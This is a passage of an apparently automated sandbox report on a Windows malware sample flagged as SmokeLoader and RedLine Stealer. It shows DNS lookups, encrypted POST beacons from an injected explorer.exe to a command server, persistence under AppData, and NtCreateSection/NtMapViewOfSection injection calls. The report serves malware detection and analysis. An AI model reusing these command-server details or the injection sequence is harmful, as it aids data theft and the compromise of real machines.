                                            Oct 20, 2024 09:40:29.154721022 CEST1.1.1.1192.168.2.40x4a84Name error (3)livbev.onlinenonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:37.993104935 CEST1.1.1.1192.168.2.40x263Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:37.993119955 CEST1.1.1.1192.168.2.40x263Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:37.993127108 CEST1.1.1.1192.168.2.40x263Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:37.993135929 CEST1.1.1.1192.168.2.40x263Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:37.993146896 CEST1.1.1.1192.168.2.40x263Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:51.032890081 CEST1.1.1.1192.168.2.40x2d67Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:51.032912016 CEST1.1.1.1192.168.2.40x2d67Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:51.032924891 CEST1.1.1.1192.168.2.40x2d67Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:51.032937050 CEST1.1.1.1192.168.2.40x2d67Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:51.053415060 CEST1.1.1.1192.168.2.40xcd97Name error (3)livbev.onlinenonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:59.940843105 CEST1.1.1.1192.168.2.40x3f1cServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:59.940856934 CEST1.1.1.1192.168.2.40x3f1cServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:59.940874100 CEST1.1.1.1192.168.2.40x3f1cServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:59.940882921 CEST1.1.1.1192.168.2.40x3f1cServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:59.940891027 CEST1.1.1.1192.168.2.40x3f1cServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false

                                            HTTP Request Dependency Graph

                                            • uepnecxbbbdpiq.org
                                              • tnc-corp.ru
                                            • strnbrsjeqnhidm.org
                                            • amjpnfqmtie.com
                                            • lkexyglvlsxrxq.org
                                            • kgbmakinbtdtwix.com
                                            • roqbxksriohvi.com

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.455686211.171.233.126802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 20, 2024 09:38:53.869266987 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://uepnecxbbbdpiq.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 191
                                            Host: tnc-corp.ru
                                            Oct 20, 2024 09:38:53.869303942 CEST191OUTData Raw: 3b 6e 22 15 f0 c3 6d 55 dd ad c0 71 0e 70 7d be 77 7f ca 94 69 03 e2 64 0f 7e 7a 90 35 b4 c5 6f e8 5d c1 21 71 6c 26 1d e7 ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 77 40 b7 e8
                                            Data Ascii: ;n"mUqp}wid~z5o]!ql&? 9Yt M@NA .[k,vuw@JGy{:Gb_u-x?kT`Q90B%HaG}6+e7}+uP


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.455718211.171.233.126802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 20, 2024 09:39:14.795099974 CEST284OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://strnbrsjeqnhidm.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 176
                                            Host: tnc-corp.ru
                                            Oct 20, 2024 09:39:14.795286894 CEST176OUTData Raw: 3b 6e 22 15 f0 c3 6d 55 dd ad c0 71 0e 70 7d be 77 7f ca 94 69 03 e2 64 0f 7e 7a 90 35 b4 c5 6f e8 5d c1 21 71 6c 26 1d e7 ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 77 43 eb be
                                            Data Ascii: ;n"mUqp}wid~z5o]!ql&? 9Yt M@NA .[k,vuwC@uQn4_JB8vOs;(VdVZ(C]0DNTka@ZH3Pw


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.455719211.171.233.126802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 20, 2024 09:39:31.911593914 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://amjpnfqmtie.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 268
                                            Host: tnc-corp.ru
                                            Oct 20, 2024 09:39:31.911611080 CEST268OUTData Raw: 3b 6e 22 15 f0 c3 6d 55 dd ad c0 71 0e 70 7d be 77 7f ca 94 69 03 e2 64 0f 7e 7a 90 35 b4 c5 6f e8 5d c1 21 71 6c 26 1d e7 ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 30 1a ba ac
                                            Data Ascii: ;n"mUqp}wid~z5o]!ql&? 9Yt M@NA .[k,vu0a<@v_ui9UZ`8^lN;d5o\nd2~\E}5jR6B~D6rRM=jrPY>(MABa3CK0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            3192.168.2.455720211.171.233.126802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 20, 2024 09:39:56.133203030 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://lkexyglvlsxrxq.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 317
                                            Host: tnc-corp.ru
                                            Oct 20, 2024 09:39:56.133219004 CEST317OUTData Raw: 3b 6e 22 15 f0 c3 6d 55 dd ad c0 71 0e 70 7d be 77 7f ca 94 69 03 e2 64 0f 7e 7a 90 35 b4 c5 6f e8 5d c1 21 71 6c 26 1d e7 ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 38 00 d1 bb
                                            Data Ascii: ;n"mUqp}wid~z5o]!ql&? 9Yt M@NA .[k,vu8f*twwd_L5hE?/juA-tkOwIdJq'C1'K;'K"?))~o0=Da{n*b


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            4192.168.2.454853211.171.233.126802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 20, 2024 09:40:21.077653885 CEST284OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://kgbmakinbtdtwix.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 209
                                            Host: tnc-corp.ru
                                            Oct 20, 2024 09:40:21.077682972 CEST209OUTData Raw: 3b 6e 22 15 f0 c3 6d 55 dd ad c0 71 0e 70 7d be 77 7f ca 94 69 03 e2 64 0f 7e 7a 90 35 b4 c5 6f e8 5d c1 21 71 6c 26 1d e7 ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 39 54 d2 ba
                                            Data Ascii: ;n"mUqp}wid~z5o]!ql&? 9Yt M@NA .[k,vu9Tu[G_`OD_(U:|[q5S8\;th{?Qn<!)d&z=U2


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            5192.168.2.454854211.171.233.126802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 20, 2024 09:40:41.913100004 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://roqbxksriohvi.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 134
                                            Host: tnc-corp.ru
                                            Oct 20, 2024 09:40:41.913130045 CEST134OUTData Raw: 3b 6e 22 15 f0 c3 6d 55 dd ad c0 71 0e 70 7d be 77 7f ca 94 69 03 e2 64 0f 7e 7a 90 35 b4 c5 6f e8 5d c1 21 71 6c 26 1d e7 ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 23 1b fa bd
                                            Data Ascii: ;n"mUqp}wid~z5o]!ql&? 9Yt M@NA .[k,vu#^_>N9ep$@!HXBd


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:03:36:58
                                            Start date:20/10/2024
                                            Path:C:\Users\user\Desktop\2Qvkmk7HGr.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\2Qvkmk7HGr.exe"
                                            Imagebase:0x400000
                                            File size:376'832 bytes
                                            MD5 hash:4BB69F9FAD0620ECB64971676B9F2CBC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1769193164.0000000002101000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1769193164.0000000002101000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1769009336.0000000000560000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1769009336.0000000000560000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1768987003.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1768955297.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:1
                                            Start time:03:37:05
                                            Start date:20/10/2024
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\Explorer.EXE
                                            Imagebase:0x7ff72b770000
                                            File size:5'141'208 bytes
                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            General

                                            Target ID:5
                                            Start time:03:37:23
                                            Start date:20/10/2024
                                            Path:C:\Users\user\AppData\Roaming\tcgiwaf
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Roaming\tcgiwaf
                                            Imagebase:0x400000
                                            File size:376'832 bytes
                                            MD5 hash:4BB69F9FAD0620ECB64971676B9F2CBC
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.2004791838.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2004938818.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2005144387.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2005144387.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2004823776.0000000000570000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2004823776.0000000000570000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 39%, ReversingLabs
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:7
                                            Start time:03:40:01
                                            Start date:20/10/2024
                                            Path:C:\Users\user\AppData\Roaming\tcgiwaf
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Roaming\tcgiwaf
                                            Imagebase:0x400000
                                            File size:376'832 bytes
                                            MD5 hash:4BB69F9FAD0620ECB64971676B9F2CBC
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:false

                                            Disassembly

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:8.7%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:37.4%
                                              Total number of Nodes:107
                                              Total number of Limit Nodes:3
                                              execution_graph 2805 55003c 2806 550049 2805->2806 2818 550e0f SetErrorMode SetErrorMode 2806->2818 2811 550265 2812 5502ce VirtualProtect 2811->2812 2814 55030b 2812->2814 2813 550439 VirtualFree 2817 5504be LoadLibraryA 2813->2817 2814->2813 2816 5508c7 2817->2816 2819 550223 2818->2819 2820 550d90 2819->2820 2821 550dad 2820->2821 2822 550dbb GetPEB 2821->2822 2823 550238 VirtualAlloc 2821->2823 2822->2823 2823->2811 2899 40198a 2900 4019a8 Sleep 2899->2900 2901 401207 2899->2901 2902 4019c3 2900->2902 2901->2900 2903 401583 7 API calls 2902->2903 2904 4019d4 2902->2904 2903->2904 2905 40158e 2906 4015bf 2905->2906 2907 401634 NtDuplicateObject 2906->2907 2915 401750 2906->2915 2908 401651 NtCreateSection 2907->2908 2907->2915 2909 4016d1 NtCreateSection 2908->2909 2910 401677 NtMapViewOfSection 2908->2910 2912 4016fd 2909->2912 2909->2915 2910->2909 2911 40169a NtMapViewOfSection 2910->2911 2911->2909 2913 4016b8 2911->2913 2914 401707 NtMapViewOfSection 2912->2914 2912->2915 2913->2909 2914->2915 2916 40172e NtMapViewOfSection 2914->2916 2916->2915 2824 402e50 2827 402e54 2824->2827 2825 402fa8 2826 401959 8 API calls 2826->2825 2827->2825 2827->2826 2832 550005 2837 55092b GetPEB 2832->2837 2834 550030 2839 55003c 2834->2839 2838 550972 2837->2838 2838->2834 2840 550049 2839->2840 2841 550e0f 2 API calls 2840->2841 2842 550223 2841->2842 2843 550d90 GetPEB 2842->2843 2844 550238 VirtualAlloc 2843->2844 2845 550265 2844->2845 2846 5502ce VirtualProtect 2845->2846 2848 55030b 2846->2848 2847 550439 VirtualFree 2851 5504be LoadLibraryA 2847->2851 2848->2847 2850 5508c7 2851->2850 2874 401970 2875 401975 2874->2875 2876 4019a8 Sleep 2875->2876 2877 4019c3 2876->2877 2878 401583 7 API calls 2877->2878 2879 4019d4 2877->2879 2878->2879 2764 403054 2765 403197 2764->2765 2766 40307e 2764->2766 2766->2765 2767 403139 RtlCreateUserThread NtTerminateProcess 2766->2767 2767->2765 2768 5314e7 2769 5314f6 2768->2769 2772 531c87 2769->2772 2775 531ca2 2772->2775 2773 531cab CreateToolhelp32Snapshot 2774 531cc7 Module32First 2773->2774 2773->2775 2776 531cd6 2774->2776 2777 5314ff 2774->2777 2775->2773 2775->2774 2779 531946 2776->2779 2780 531971 2779->2780 2781 531982 VirtualAlloc 2780->2781 2782 5319ba 2780->2782 2781->2782 2782->2782 2852 550001 2853 550005 2852->2853 2854 55092b GetPEB 2853->2854 2855 550030 2854->2855 2856 55003c 7 API calls 2855->2856 2857 550038 2856->2857 2783 402f17 2786 402f1c 2783->2786 2784 402fa8 2786->2784 2787 401959 2786->2787 2788 401968 2787->2788 2789 4019a8 Sleep 2788->2789 2790 4019c3 2789->2790 2792 4019d4 2790->2792 2793 401583 2790->2793 2792->2784 2794 401594 2793->2794 2795 401634 NtDuplicateObject 2794->2795 2803 401750 2794->2803 2796 401651 NtCreateSection 2795->2796 2795->2803 2797 4016d1 NtCreateSection 2796->2797 2798 401677 NtMapViewOfSection 2796->2798 2800 4016fd 2797->2800 2797->2803 2798->2797 2799 40169a NtMapViewOfSection 2798->2799 2799->2797 2801 4016b8 2799->2801 2802 401707 NtMapViewOfSection 2800->2802 2800->2803 2801->2797 2802->2803 2804 40172e NtMapViewOfSection 2802->2804 2803->2792 2804->2803 2886 401919 2887 401969 2886->2887 2888 40191d 2886->2888 2889 4019a8 Sleep 2887->2889 2890 4019c3 2889->2890 2891 401583 7 API calls 2890->2891 2892 4019d4 2890->2892 2891->2892

                                              Executed Functions

                                              Function 00401583 Relevance: 10.7, APIs: 7, Instructions: 203nativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 85 401583-4015de call 401207 97 4015e0 85->97 98 4015e3-4015e8 85->98 97->98 100 401909-401911 98->100 101 4015ee-4015ff 98->101 100->98 104 401916-401956 call 401207 100->104 105 401605-40162e 101->105 106 401907 101->106 105->106 113 401634-40164b NtDuplicateObject 105->113 106->104 113->106 115 401651-401675 NtCreateSection 113->115 117 4016d1-4016f7 NtCreateSection 115->117 118 401677-401698 NtMapViewOfSection 115->118 117->106 121 4016fd-401701 117->121 118->117 120 40169a-4016b6 NtMapViewOfSection 118->120 120->117 123 4016b8-4016ce 120->123 121->106 124 401707-401728 NtMapViewOfSection 121->124 123->117 124->106 126 40172e-40174a NtMapViewOfSection 124->126 126->106 130 401750 126->130 130->106 131 401750 call 401755 130->131 131->106
                                              APIs
                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B1
                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F2
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401723
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401745
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1768696668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_2Qvkmk7HGr.jbxd
                                              Similarity
                                              • API ID: Section$View$Create$DuplicateObject
                                              • String ID:
                                              • API String ID: 1546783058-0
                                              • Opcode ID: d8025aa2a73fa1757bf9d96cb7b1acd78e4ac8c64498884b03c6ab91ddf532bc
                                              • Instruction ID: f2d5e20ae79a609852431105b0704d648b73f45673a5aa535929140ce5e9a1ec
                                              • Opcode Fuzzy Hash: d8025aa2a73fa1757bf9d96cb7b1acd78e4ac8c64498884b03c6ab91ddf532bc
                                              • Instruction Fuzzy Hash: 42614DB0900209FFEB218F91CC48FAF7BB8EF85710F10012AF952BA1E5D6749941DB25
                                              Function 0040158E Relevance: 10.7, APIs: 7, Instructions: 175nativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 132 40158e-4015b6 133 4015c8 132->133 134 4015bf-4015de call 401207 132->134 133->134 138 4015e0 134->138 139 4015e3-4015e8 134->139 138->139 141 401909-401911 139->141 142 4015ee-4015ff 139->142 141->139 145 401916-401956 call 401207 141->145 146 401605-40162e 142->146 147 401907 142->147 146->147 154 401634-40164b NtDuplicateObject 146->154 147->145 154->147 156 401651-401675 NtCreateSection 154->156 158 4016d1-4016f7 NtCreateSection 156->158 159 401677-401698 NtMapViewOfSection 156->159 158->147 162 4016fd-401701 158->162 159->158 161 40169a-4016b6 NtMapViewOfSection 159->161 161->158 164 4016b8-4016ce 161->164 162->147 165 401707-401728 NtMapViewOfSection 162->165 164->158 165->147 167 40172e-40174a NtMapViewOfSection 165->167 167->147 171 401750 167->171 171->147 172 401750 call 401755 171->172 172->147
                                              APIs
                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B1
                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F2
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401723
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401745
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1768696668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_2Qvkmk7HGr.jbxd
                                              Similarity
                                              • API ID: Section$View$Create$DuplicateObject
                                              • String ID:
                                              • API String ID: 1546783058-0
                                              • Opcode ID: b0195c2069dc6e331d8d87e09b392f04d65fbe6eaf74cb5c44d370e3a2e163ea
                                              • Instruction ID: 0dfbee2a1f0830b6acdc9e972913786be015a59f94024eee438c43ca1dd55f4f
                                              • Opcode Fuzzy Hash: b0195c2069dc6e331d8d87e09b392f04d65fbe6eaf74cb5c44d370e3a2e163ea
                                              • Instruction Fuzzy Hash: BA5139B1900249BFEF218F91CC49FEBBFB8EF86714F140159F951AA2A5D670A941CB24
                                              Function 004015BC Relevance: 10.7, APIs: 7, Instructions: 163nativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 173 4015bc-4015c5 174 4015d0-4015de 173->174 175 4015ca call 401207 173->175 176 4015e0 174->176 177 4015e3-4015e8 174->177 175->174 176->177 179 401909-401911 177->179 180 4015ee-4015ff 177->180 179->177 183 401916-401956 call 401207 179->183 184 401605-40162e 180->184 185 401907 180->185 184->185 192 401634-40164b NtDuplicateObject 184->192 185->183 192->185 194 401651-401675 NtCreateSection 192->194 196 4016d1-4016f7 NtCreateSection 194->196 197 401677-401698 NtMapViewOfSection 194->197 196->185 200 4016fd-401701 196->200 197->196 199 40169a-4016b6 NtMapViewOfSection 197->199 199->196 202 4016b8-4016ce 199->202 200->185 203 401707-401728 NtMapViewOfSection 200->203 202->196 203->185 205 40172e-40174a NtMapViewOfSection 203->205 205->185 209 401750 205->209 209->185 210 401750 call 401755 209->210 210->185
                                              APIs
                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B1
                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F2
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401723
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401745
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1768696668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_2Qvkmk7HGr.jbxd
                                              Similarity
                                              • API ID: Section$View$Create$DuplicateObject
                                              • String ID:
                                              • API String ID: 1546783058-0
                                              • Opcode ID: cc208e499be32a7b8d2e1b8f44698ba7bae8291931bb2c7a737ae2018edfaae9
                                              • Instruction ID: 9e9cfe78a9b9fcbe8a20f4c56589f3f995e8910032e3214eb5438fd9bfe06916
                                              • Opcode Fuzzy Hash: cc208e499be32a7b8d2e1b8f44698ba7bae8291931bb2c7a737ae2018edfaae9
                                              • Instruction Fuzzy Hash: 855129B1900249BFEF218F91CC48FAFBBB8EF86B15F100159F951AA2A5D7709940CB20
                                              Function 00403054 Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 211 403054-403078 212 403197-40319c 211->212 213 40307e-403096 211->213 213->212 214 40309c-4030ad 213->214 215 4030af-4030b8 214->215 216 4030bd-4030cb 215->216 216->216 217 4030cd-4030d4 216->217 218 4030f6-4030fd 217->218 219 4030d6-4030f5 217->219 220 40311f-403122 218->220 221 4030ff-40311e 218->221 219->218 222 403124-403127 220->222 223 40312b 220->223 221->220 222->223 224 403129 222->224 223->215 225 40312d-403132 223->225 224->225 225->212 226 403134-403137 225->226 226->212 227 403139-403194 RtlCreateUserThread NtTerminateProcess 226->227 227->212
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1768696668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_2Qvkmk7HGr.jbxd
                                              Similarity
                                              • API ID: CreateProcessTerminateThreadUser
                                              • String ID:
                                              • API String ID: 1921587553-0
                                              • Opcode ID: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                              • Instruction ID: bb3d83799e525a3431e0f051c565fd2002d42970a2b52bf5f395df3a052ac564
                                              • Opcode Fuzzy Hash: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                              • Instruction Fuzzy Hash: 9F412732618E0C4FD768EE6CA84966377D5E798311F1A43ABD809D7389EE30D85187C5
                                              Function 00531C87 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 228 531c87-531ca0 229 531ca2-531ca4 228->229 230 531ca6 229->230 231 531cab-531cb7 CreateToolhelp32Snapshot 229->231 230->231 232 531cc7-531cd4 Module32First 231->232 233 531cb9-531cbf 231->233 234 531cd6-531cd7 call 531946 232->234 235 531cdd-531ce5 232->235 233->232 238 531cc1-531cc5 233->238 239 531cdc 234->239 238->229 238->232 239->235
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00531CAF
                                              • Module32First.KERNEL32(00000000,00000224), ref: 00531CCF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1768955297.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_520000_2Qvkmk7HGr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 3833638111-0
                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                              • Instruction ID: b82a74f825a896779aaf3ad3a105d1ddb4c3915e02c155b3b866728b0ce944b1
                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
